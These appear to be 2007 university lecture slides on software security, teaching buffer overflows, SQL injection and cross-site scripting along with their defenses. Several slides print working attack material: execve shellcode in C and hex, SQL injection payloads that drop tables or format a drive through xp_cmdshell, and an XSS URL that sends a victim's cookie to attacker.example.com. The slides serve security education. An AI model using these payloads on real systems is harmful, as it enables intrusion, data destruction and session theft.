april 26, 2007 centre college: software security
DESCRIPTION
TRANSCRIPT
![Page 1: April 26, 2007 Centre College: Software Security](https://reader033.vdocuments.site/reader033/viewer/2022061119/546b1b02af795919088b4ecc/html5/thumbnails/1.jpg)
April 26, 2007 Centre College: Software Security
Software SecurityHave You Ever Written a Security
Bug?
![Page 2: April 26, 2007 Centre College: Software Security](https://reader033.vdocuments.site/reader033/viewer/2022061119/546b1b02af795919088b4ecc/html5/thumbnails/2.jpg)
April 26, 2007 Centre College: Software Security
Charles Frank
• Department of Computer Science
• Northern Kentucky University
• http://www.nku.edu/~frank
![Page 3: April 26, 2007 Centre College: Software Security](https://reader033.vdocuments.site/reader033/viewer/2022061119/546b1b02af795919088b4ecc/html5/thumbnails/3.jpg)
April 26, 2007 Centre College: Software Security
What We Don’t Know
“Have you ever written a program section with a security hole? How do you know?”
Mark G. Graff & Kenneth R. van Wyk
![Page 4: April 26, 2007 Centre College: Software Security](https://reader033.vdocuments.site/reader033/viewer/2022061119/546b1b02af795919088b4ecc/html5/thumbnails/4.jpg)
April 26, 2007 Centre College: Software Security
A Growing Problem
1995 1996 1997 1998 1999 2000 2001 2002 2003 2004 2005 2006
0
1000
2000
3000
4000
5000
6000
7000
8000
9000
Software Vulnerabilities
Year
Vu
lne
rab
iliti
es
![Page 5: April 26, 2007 Centre College: Software Security](https://reader033.vdocuments.site/reader033/viewer/2022061119/546b1b02af795919088b4ecc/html5/thumbnails/5.jpg)
April 26, 2007 Centre College: Software Security
Traditional Security is Reactive
• Perimeter defense (firewalls)
• Intrusion detection• Over-reliance on
cryptography• Penetrate & patch• Penetration testing
![Page 6: April 26, 2007 Centre College: Software Security](https://reader033.vdocuments.site/reader033/viewer/2022061119/546b1b02af795919088b4ecc/html5/thumbnails/6.jpg)
April 26, 2007 Centre College: Software Security
What is web application security?
It’s more than just cryptography.– SSL won’t solve all your problems.
It’s more than securing the web server.– Web applications have their own problems.
It’s more than application firewalls.– Firewall can’t know every safe action at every
possible state in your application.
![Page 7: April 26, 2007 Centre College: Software Security](https://reader033.vdocuments.site/reader033/viewer/2022061119/546b1b02af795919088b4ecc/html5/thumbnails/7.jpg)
April 26, 2007 Centre College: Software Security
Firewalls don’t protect web apps
Firewall
Port 80HTTP Traffic
WebClient
WebServer
Application
Application
DatabaseServer
![Page 8: April 26, 2007 Centre College: Software Security](https://reader033.vdocuments.site/reader033/viewer/2022061119/546b1b02af795919088b4ecc/html5/thumbnails/8.jpg)
April 26, 2007 Centre College: Software Security
Penetrate and Patch
Discover flaws after deployment.Often by attackers.
Users may not deploy patches.
Patches may have security flaws (15%?)
Patches are maps to vulnerabilities.Attackers reverse engineer to create attacks.
![Page 10: April 26, 2007 Centre College: Software Security](https://reader033.vdocuments.site/reader033/viewer/2022061119/546b1b02af795919088b4ecc/html5/thumbnails/10.jpg)
April 26, 2007 Centre College: Software Security
The Problem is Software
“We wouldn’t have to spend so much time and effort on network security if we didn’t have such bad software security”
Bruce Schneier“Applied Cryptography”
“Secrets & Lies: Digital Security in a Networked World”
![Page 11: April 26, 2007 Centre College: Software Security](https://reader033.vdocuments.site/reader033/viewer/2022061119/546b1b02af795919088b4ecc/html5/thumbnails/11.jpg)
April 26, 2007 Centre College: Software Security
Hackers
“Malicious hackers don’t create security holes; they simply exploit them. Security holes and vulnerabilities – the real root cause of the problem – are the result of bad software design and implementation.”
John Viega & Gary McGraw
![Page 12: April 26, 2007 Centre College: Software Security](https://reader033.vdocuments.site/reader033/viewer/2022061119/546b1b02af795919088b4ecc/html5/thumbnails/12.jpg)
April 26, 2007 Centre College: Software Security
Developers Aren’t Ready
“64% of developers are not confident in their ability to write secure applications”
Bill Gates, RSA 2005
![Page 13: April 26, 2007 Centre College: Software Security](https://reader033.vdocuments.site/reader033/viewer/2022061119/546b1b02af795919088b4ecc/html5/thumbnails/13.jpg)
April 26, 2007 Centre College: Software Security
Industry Problem
• There is no software liability – no incentive for secure software
• Most developers never learned to produce secure code
• Because of competition and cost considerations, software is produced under severe time constraints.
![Page 14: April 26, 2007 Centre College: Software Security](https://reader033.vdocuments.site/reader033/viewer/2022061119/546b1b02af795919088b4ecc/html5/thumbnails/14.jpg)
April 26, 2007 Centre College: Software Security
Developer’s Education
• Most programming courses ignore secure software development
• Most software engineering courses ignore secure software engineering
![Page 15: April 26, 2007 Centre College: Software Security](https://reader033.vdocuments.site/reader033/viewer/2022061119/546b1b02af795919088b4ecc/html5/thumbnails/15.jpg)
April 26, 2007 Centre College: Software Security
Complexity
• Software products are growing in size• Windows XP has 40 million lines of code• 5-50 bugs per KLOC• 10% of bugs result in security faults• 40,000KLOC*5*10% = 25,000 security bugs• Software is often written in low level
languages such as C/C++
![Page 16: April 26, 2007 Centre College: Software Security](https://reader033.vdocuments.site/reader033/viewer/2022061119/546b1b02af795919088b4ecc/html5/thumbnails/16.jpg)
April 26, 2007 Centre College: Software Security
Security Problems
SECURITY BUGS
50%
• Buffer overflow
• Command injection
• Cross-site scripting
• Integer overflow
• Race condition
• Untrusted input
ARCHITECTURAL FLAWS
50%
• Cryptography misuse
• Lack of compartmentalization
• More privilege than necessary
• Relying on secret algorithms
• Sharing resources
• Usability problems
![Page 17: April 26, 2007 Centre College: Software Security](https://reader033.vdocuments.site/reader033/viewer/2022061119/546b1b02af795919088b4ecc/html5/thumbnails/17.jpg)
April 26, 2007 Centre College: Software Security
Essential Facts
Software Security ≠ Security FeaturesCryptography will not make you secure.
Application firewalls will not provide security.
50/50 Architecture/Coding Problems
An Emergent Property of SoftwareLike Usability or Reliability
Not a Feature
![Page 18: April 26, 2007 Centre College: Software Security](https://reader033.vdocuments.site/reader033/viewer/2022061119/546b1b02af795919088b4ecc/html5/thumbnails/18.jpg)
April 26, 2007 Centre College: Software Security
Software Security Practices
1. Code Reviews
2. Risk Analysis
3. Penetration Testing
SecurityOperations
Requirements Design Coding Testing Maintenance
RiskAnalysis
AbuseCases
Code Reviews +Static Analysis
PenetrationTesting
SecurityTesting
4. Security Testing
5. Abuse Cases
6. Security Operations
![Page 20: April 26, 2007 Centre College: Software Security](https://reader033.vdocuments.site/reader033/viewer/2022061119/546b1b02af795919088b4ecc/html5/thumbnails/20.jpg)
April 26, 2007 Centre College: Software Security
Software Vulnerabilities1. Malicious Client2. Buffer Overflow3. SQL Injection4. Cross-site Scripting5. Format String6. Race Condition7. Information Leakage8. Path Traversal9. Command Injection10. Integer Overflow11. PHP Include
![Page 21: April 26, 2007 Centre College: Software Security](https://reader033.vdocuments.site/reader033/viewer/2022061119/546b1b02af795919088b4ecc/html5/thumbnails/21.jpg)
April 26, 2007 Centre College: Software Security
Malicious Client
• Developers can mistakenly trust data from a client in server-side code
• Attackers can advantage of this trust
• Security tester’s job is to violate the data specifications to find security vulnerabilities
![Page 22: April 26, 2007 Centre College: Software Security](https://reader033.vdocuments.site/reader033/viewer/2022061119/546b1b02af795919088b4ecc/html5/thumbnails/22.jpg)
April 26, 2007 Centre College: Software Security
Manipulate Network Requests
• Write a client to send custom requests– Might modify the client code to send malformed
requests
• Use a proxy to receive network traffic from a client and modify it to send it to the server.– Foxfire Add-on “Tamper Data”– WebScarab from OWASP
![Page 23: April 26, 2007 Centre College: Software Security](https://reader033.vdocuments.site/reader033/viewer/2022061119/546b1b02af795919088b4ecc/html5/thumbnails/23.jpg)
April 26, 2007 Centre College: Software Security
Tamper Data
• Firefox Browser Add-on
• Google for Tamper Data
• Tools | Tamper Data
![Page 26: April 26, 2007 Centre College: Software Security](https://reader033.vdocuments.site/reader033/viewer/2022061119/546b1b02af795919088b4ecc/html5/thumbnails/26.jpg)
April 26, 2007 Centre College: Software Security
Buffer Overflow Topics
1. What is a Buffer Overflow?
2. Buffer Overflow Examples
3. Program Stacks
4. Smashing the Stack
5. Shellcode
6. Mitigations
![Page 27: April 26, 2007 Centre College: Software Security](https://reader033.vdocuments.site/reader033/viewer/2022061119/546b1b02af795919088b4ecc/html5/thumbnails/27.jpg)
April 26, 2007 Centre College: Software Security
Buffer OverflowsA program accepts too much input and stores it in a fixed length buffer that’s too small.
char A[8];short B;
A A A A A A A A B B
0 0 0 0 0 0 0 0 0 3
A A A A A A A A B B
o v e r f l o w s 0
gets(A);
![Page 28: April 26, 2007 Centre College: Software Security](https://reader033.vdocuments.site/reader033/viewer/2022061119/546b1b02af795919088b4ecc/html5/thumbnails/28.jpg)
April 26, 2007 Centre College: Software Security
Buffer Overflow Examples
Morris WormTook down most of Internet in 1988.
Exploited a buffer overflow in fingerd.
Subsequent worms used overflow attacks too.
MS07-004: Internet ExplorerBuffer overflow in VML.
Allows remote code execution.
Not the first overflow in IE or other browsers.
![Page 29: April 26, 2007 Centre College: Software Security](https://reader033.vdocuments.site/reader033/viewer/2022061119/546b1b02af795919088b4ecc/html5/thumbnails/29.jpg)
April 26, 2007 Centre College: Software Security
Buffer Overflow Example #1What’s the mistake in this program?
int main() {
int array[5] = {1, 2, 3, 4, 5}; printf("%d\n", array[5]);
}
Program output:
> gcc -o buffer buffer.c
> ./buffer7077876
![Page 30: April 26, 2007 Centre College: Software Security](https://reader033.vdocuments.site/reader033/viewer/2022061119/546b1b02af795919088b4ecc/html5/thumbnails/30.jpg)
April 26, 2007 Centre College: Software Security
Buffer Overflow Example #2Writing beyond the buffer:
int main() { int array[5] = {1, 2, 3, 4, 5}; int i;
for( i=0; i <= 255; ++i ) array[i] = 41;}
Program output: > gcc -o bufferw bufferw.c> ./bufferwSegmentation fault (core dumped)
![Page 31: April 26, 2007 Centre College: Software Security](https://reader033.vdocuments.site/reader033/viewer/2022061119/546b1b02af795919088b4ecc/html5/thumbnails/31.jpg)
April 26, 2007 Centre College: Software Security
What happened to our program?
The buffer overflow:Overwrote memory beyond buffer with 41.
Memory page was not writable by program.
OS terminated prog with segmentation fault.
Do overflows always produce a crash?Most of the time, yes.
Careful attacker can access valid memory.
![Page 32: April 26, 2007 Centre College: Software Security](https://reader033.vdocuments.site/reader033/viewer/2022061119/546b1b02af795919088b4ecc/html5/thumbnails/32.jpg)
April 26, 2007 Centre College: Software Security
Why do programmers keep making the same mistake?
C/C++ inherently unsafe.
No bounds checking.
Unsafe library functions: strcpy(), sprintf(), gets(), scanf(), etc.
Java, Python largely immune.C/C++ gains performance by not checking.
![Page 33: April 26, 2007 Centre College: Software Security](https://reader033.vdocuments.site/reader033/viewer/2022061119/546b1b02af795919088b4ecc/html5/thumbnails/33.jpg)
April 26, 2007 Centre College: Software Security
Stack at Function Start
Frame Pointer
Stack Pointer
old stack frame
parameter #N
…
parameter #1
return address
old FP
local vars
![Page 34: April 26, 2007 Centre College: Software Security](https://reader033.vdocuments.site/reader033/viewer/2022061119/546b1b02af795919088b4ecc/html5/thumbnails/34.jpg)
April 26, 2007 Centre College: Software Security
Shellcode
Shellcode is machine code that starts a command shell. With a shell, you can run any command.
![Page 35: April 26, 2007 Centre College: Software Security](https://reader033.vdocuments.site/reader033/viewer/2022061119/546b1b02af795919088b4ecc/html5/thumbnails/35.jpg)
April 26, 2007 Centre College: Software Security
ShellcodeShellcode in C.
int main() { char *name[2]; name[0] = "/bin/sh"; name[1] = 0x0; execve(name[0], name, 0x0);}
Running the program.> gcc –ggdb –static –o shell shellcode.c> ./shellsh-3.00$ exit
![Page 36: April 26, 2007 Centre College: Software Security](https://reader033.vdocuments.site/reader033/viewer/2022061119/546b1b02af795919088b4ecc/html5/thumbnails/36.jpg)
April 26, 2007 Centre College: Software Security
From C to Machine Languagechar shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b""\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd""\x80\xe8\xdc\xff\xff\xff/bin/sh";
void main() { int *ret; ret = (int *)&ret + 2; (*ret) = (int)shellcode;}
> gcc -o testsc2 testsc2.c> ./testsc2sh-3.00$ exit
![Page 37: April 26, 2007 Centre College: Software Security](https://reader033.vdocuments.site/reader033/viewer/2022061119/546b1b02af795919088b4ecc/html5/thumbnails/37.jpg)
April 26, 2007 Centre College: Software Security
Writing an Exploit
1. Construct shellcode to inject.2. Find exploitable buffer in a program.3. Estimate address of buffer.4. Run program with an input that:
1. Injects shellcode into stack memory.2. Overwrites return address with address of your
shellcode.
![Page 38: April 26, 2007 Centre College: Software Security](https://reader033.vdocuments.site/reader033/viewer/2022061119/546b1b02af795919088b4ecc/html5/thumbnails/38.jpg)
April 26, 2007 Centre College: Software Security
Compiler Defenses: Canaries
Goal: Detect altered return addresses.
Method: Compiler changes stack layout.Adds canary to stack when function called.
Must overwrite canary to change return addr.
Checks canary before function returns.
Terminate program if canary modified.
Canaries are random to prevent guessing.
Visual Studio 2005 and gcc 4.1 use canaries.
![Page 39: April 26, 2007 Centre College: Software Security](https://reader033.vdocuments.site/reader033/viewer/2022061119/546b1b02af795919088b4ecc/html5/thumbnails/39.jpg)
April 26, 2007 Centre College: Software Security
Canary Stack Layout
old frame
param2
param1
return address
saved EBP
canary value
local vars
![Page 40: April 26, 2007 Centre College: Software Security](https://reader033.vdocuments.site/reader033/viewer/2022061119/546b1b02af795919088b4ecc/html5/thumbnails/40.jpg)
April 26, 2007 Centre College: Software Security
Buffer Overflow: Key Points
Buffer overflow attacks.– C/C++ perform no bounds checking.– There is no difference btw code and data.– Smashing the stack.
Mitigating buffer overflows.– Use a language with bounds checking.– Check your own bounds in C/C++.– Use safe functions, string libraries.
![Page 41: April 26, 2007 Centre College: Software Security](https://reader033.vdocuments.site/reader033/viewer/2022061119/546b1b02af795919088b4ecc/html5/thumbnails/41.jpg)
April 26, 2007 Centre College: Software Security
SQL Injection1. App sends form to user.2. Attacker submits form
with SQL exploit data.3. Application builds string
with exploit data.4. Application sends SQL
query to DB.5. DB executes query,
including exploit, sends data back to application.
6. Application returns data to user.
Attacker
Web Server DB Server
Firewall
User
Pass
‘ or 1=1--
![Page 42: April 26, 2007 Centre College: Software Security](https://reader033.vdocuments.site/reader033/viewer/2022061119/546b1b02af795919088b4ecc/html5/thumbnails/42.jpg)
April 26, 2007 Centre College: Software Security
SQL Injection in PHP
$link = mysql_connect($DB_HOST, $DB_USERNAME, $DB_PASSWORD) or die ("Couldn't connect: " . mysql_error());
mysql_select_db($DB_DATABASE);
$query = "select count(*) from users where username = '$username' and password = '$password'";
$result = mysql_query($query);
![Page 43: April 26, 2007 Centre College: Software Security](https://reader033.vdocuments.site/reader033/viewer/2022061119/546b1b02af795919088b4ecc/html5/thumbnails/43.jpg)
April 26, 2007 Centre College: Software Security
SQL Metacharacters‘ quotes parameters
; separates commands
-- comments
%, _ glob in LIKE clause
%, _, *, +, |, [], () used for regular expressions in SIMILAR TO clause
![Page 44: April 26, 2007 Centre College: Software Security](https://reader033.vdocuments.site/reader033/viewer/2022061119/546b1b02af795919088b4ecc/html5/thumbnails/44.jpg)
April 26, 2007 Centre College: Software Security
SQL Injection Attack #1
Unauthorized Access Attempt:password = ’ or 1=1 --
SQL statement becomes:select count(*) from users where username =
‘user’ and password = ‘’ or 1=1 --
Checks if password is empty OR 1=1, which is always true, permitting access.
![Page 45: April 26, 2007 Centre College: Software Security](https://reader033.vdocuments.site/reader033/viewer/2022061119/546b1b02af795919088b4ecc/html5/thumbnails/45.jpg)
April 26, 2007 Centre College: Software Security
SQL Injection Attack #2
Database Modification Attack:password = foo’; delete from table users
where username like ‘%
Database executes two SQL statements:select count(*) from users where username =
‘user’ and password = ‘foo’
delete from table users where username like ‘%’
![Page 46: April 26, 2007 Centre College: Software Security](https://reader033.vdocuments.site/reader033/viewer/2022061119/546b1b02af795919088b4ecc/html5/thumbnails/46.jpg)
April 26, 2007 Centre College: Software Security
Impact of SQL InjectionSELECT SSN FROM USERS WHERE UID=‘$UID’
INPUT RESULT
5 Returns info for user with UID 5.
‘ OR 1=1-- Returns info for all users.
‘ UNION SELECT Field FROM Table WHERE 1=1--
Returns all rows from another table.
‘;DROP TABLE USERS--
Deletes the users table.
‘;master.dbo.xp_cmdshell ‘cmd.exe format c: /q /yes’ --
Formats C: drive of database server if you’re running MS SQL Server and extended procedures aren’t disabled.
![Page 47: April 26, 2007 Centre College: Software Security](https://reader033.vdocuments.site/reader033/viewer/2022061119/546b1b02af795919088b4ecc/html5/thumbnails/47.jpg)
April 26, 2007 Centre College: Software Security
Solution: Prepared Queries
require_once 'MDB2.php';
$mdb2 =& MDB2::factory($dsn, $options);
if (PEAR::isError($mdb2)) {
die($mdb2->getMessage());
}
$sql = “SELECT count(*) from users where username = ? and password = ?”;
$types = array('text', 'text');
$sth = $mdb2->prepare($sql, $types, MDB2_PREPARE_MANIP);
$data = array($username, $password);
$sth->execute($data);
![Page 48: April 26, 2007 Centre College: Software Security](https://reader033.vdocuments.site/reader033/viewer/2022061119/546b1b02af795919088b4ecc/html5/thumbnails/48.jpg)
April 26, 2007 Centre College: Software Security
Cross Site Scripting Attacks (XSS)
• Run Javascript in the victim’s browser– <script>alert(‘XSS’);</script>
• Get the user’s cookie for the Web site to display – perhaps revealing the session ID– <script>alert(document.cookie);</script>
• Steal the cookie and hijack the user’s session– Craft a request to the attackers machine with the cookie as
part of the file name, e.g. for an image source.
![Page 49: April 26, 2007 Centre College: Software Security](https://reader033.vdocuments.site/reader033/viewer/2022061119/546b1b02af795919088b4ecc/html5/thumbnails/49.jpg)
April 26, 2007 Centre College: Software Security
Reflected XSS Attacks
Server side code takes script in user input and echoes the script back to run on the user machine.
![Page 50: April 26, 2007 Centre College: Software Security](https://reader033.vdocuments.site/reader033/viewer/2022061119/546b1b02af795919088b4ecc/html5/thumbnails/50.jpg)
April 26, 2007 Centre College: Software Security
Example
http://server/search.aspx?keyword=<SCRIPT> alert(“Running!)</SCRIPT>
<BODY><H1>Search Results</H1>for =<SCRIPT> alert(“Running!)</SCRIPT><h2>Sorry, no results were found for.</h2>
![Page 51: April 26, 2007 Centre College: Software Security](https://reader033.vdocuments.site/reader033/viewer/2022061119/546b1b02af795919088b4ecc/html5/thumbnails/51.jpg)
April 26, 2007 Centre College: Software Security
Exploiting an XSS Bug
• Attacker must trick the user into running the URL with the query string.
• Send a user an email with a link to a Web site
• http://server/search.aspx?keyword=<SCRIPT>document.location=“http://attacker.example.com/default.aspx?%2Bescape(document.cookie);”</SCRIPT>
![Page 52: April 26, 2007 Centre College: Software Security](https://reader033.vdocuments.site/reader033/viewer/2022061119/546b1b02af795919088b4ecc/html5/thumbnails/52.jpg)
April 26, 2007 Centre College: Software Security
Anatomy of an XSS Attack
1. Login
2.
Cookie
Web Server
3. XSS Attack
Attacker User
4. User clicks on XSS link.
5. XSS URL
7. Browser runs injected code.
Evil Site saves cookie.
8. Attacker uses stolen cookie to hijack user session.
6. Page with injected code.
![Page 53: April 26, 2007 Centre College: Software Security](https://reader033.vdocuments.site/reader033/viewer/2022061119/546b1b02af795919088b4ecc/html5/thumbnails/53.jpg)
April 26, 2007 Centre College: Software Security
Exploiting POST<body><% dim strName: strName = Request.Form("myName") if strName = "" then %> <form method="POST" name="myForm"> Name: <input type="text" name="myName"> <input type="submit" value="Submit"> </form></body></html> <% Response.End Else Response.Write "Hello, " & strName & ". Nice to meet you." End If%></body>
![Page 54: April 26, 2007 Centre College: Software Security](https://reader033.vdocuments.site/reader033/viewer/2022061119/546b1b02af795919088b4ecc/html5/thumbnails/54.jpg)
April 26, 2007 Centre College: Software Security
What should we enter for Name?
<SCRIPT>alert(‘XSS!’)</SCRIPT>
![Page 55: April 26, 2007 Centre College: Software Security](https://reader033.vdocuments.site/reader033/viewer/2022061119/546b1b02af795919088b4ecc/html5/thumbnails/55.jpg)
April 26, 2007 Centre College: Software Security
Getting the Victim to Submit Malicious POST
Attackers can trick victims into sending the script data in the POST by hosting the form that asks for the user’s name on the attacker’s Web site. The attacker can pre-populate the Name field with the script that exploits the XSS vulnerability.
![Page 56: April 26, 2007 Centre College: Software Security](https://reader033.vdocuments.site/reader033/viewer/2022061119/546b1b02af795919088b4ecc/html5/thumbnails/56.jpg)
April 26, 2007 Centre College: Software Security
Testing
• Save the Web page to your site.
• <form method=“POST” name=“myForm” action=http://VulnerableWebSite/helloPostDemo.asp>
• <input type=“text” name=“myName” value=“<SCRIPT>alert(‘Hi!’)</SCRIPT>”>
![Page 57: April 26, 2007 Centre College: Software Security](https://reader033.vdocuments.site/reader033/viewer/2022061119/546b1b02af795919088b4ecc/html5/thumbnails/57.jpg)
April 26, 2007 Centre College: Software Security
Automatically Submitting
<body>
….
<SCRIPT>Form.submit();</SCRIPT>
![Page 58: April 26, 2007 Centre College: Software Security](https://reader033.vdocuments.site/reader033/viewer/2022061119/546b1b02af795919088b4ecc/html5/thumbnails/58.jpg)
April 26, 2007 Centre College: Software Security
Persistent XSS Attack
• Put <script>alert(‘Hi!’)</script> into a guestbook entry.
• View the guestbook entries page again.
![Page 59: April 26, 2007 Centre College: Software Security](https://reader033.vdocuments.site/reader033/viewer/2022061119/546b1b02af795919088b4ecc/html5/thumbnails/59.jpg)
April 26, 2007 Centre College: Software Security
Stopping XSS Attacks
• Encode HTML of attacker’s input before returning it to the browser.
• Problem: Blogs may want users to use HTML. Block the script tag?
Original
Character
HTML
Encoded
< <
> >
& &
“ "
![Page 60: April 26, 2007 Centre College: Software Security](https://reader033.vdocuments.site/reader033/viewer/2022061119/546b1b02af795919088b4ecc/html5/thumbnails/60.jpg)
April 26, 2007 Centre College: Software Security
Events
• Most tags have events
<INPUT name=“txtInput2” type=“text” value = ‘ OurData’ onclick=alert(‘Hi’) junk=‘’>
• When the user clicks on the text box the onclick event will fire.
![Page 61: April 26, 2007 Centre College: Software Security](https://reader033.vdocuments.site/reader033/viewer/2022061119/546b1b02af795919088b4ecc/html5/thumbnails/61.jpg)
April 26, 2007 Centre College: Software Security
Microsoft ASP.NET
• When ValidateRequest property is enabled, the query string and POST data are inspected.
• Suspicious data, such as <script> and onload=, cause an exception to be thrown.
![Page 62: April 26, 2007 Centre College: Software Security](https://reader033.vdocuments.site/reader033/viewer/2022061119/546b1b02af795919088b4ecc/html5/thumbnails/62.jpg)
April 26, 2007 Centre College: Software Security
Identifying XSS Vulnerabilities
1. Identify where user data is supplied.
2. Send valid-looking data to the application.
3. Verify whether any of the data is returned to the Web browser.
4. Find ways to force the victim to send data and have it run as a script on the client machine.
![Page 63: April 26, 2007 Centre College: Software Security](https://reader033.vdocuments.site/reader033/viewer/2022061119/546b1b02af795919088b4ecc/html5/thumbnails/63.jpg)
April 26, 2007 Centre College: Software Security
Knowledge
SPI Dynamic White papers– http://www.spidynamics.com/spilabs/education/wh
itepapers.html
– Blind SQL Injection– Cross Site Scripting
![Page 64: April 26, 2007 Centre College: Software Security](https://reader033.vdocuments.site/reader033/viewer/2022061119/546b1b02af795919088b4ecc/html5/thumbnails/64.jpg)
April 26, 2007 Centre College: Software Security
OWASP Web Goat
Teaches Web application security through a series of lessons.
http://www.owasp.org/index.php/OWASP_WebGoat_Project
Lesson Planshttp://www.owasp.org/index.php/Lesson_Plans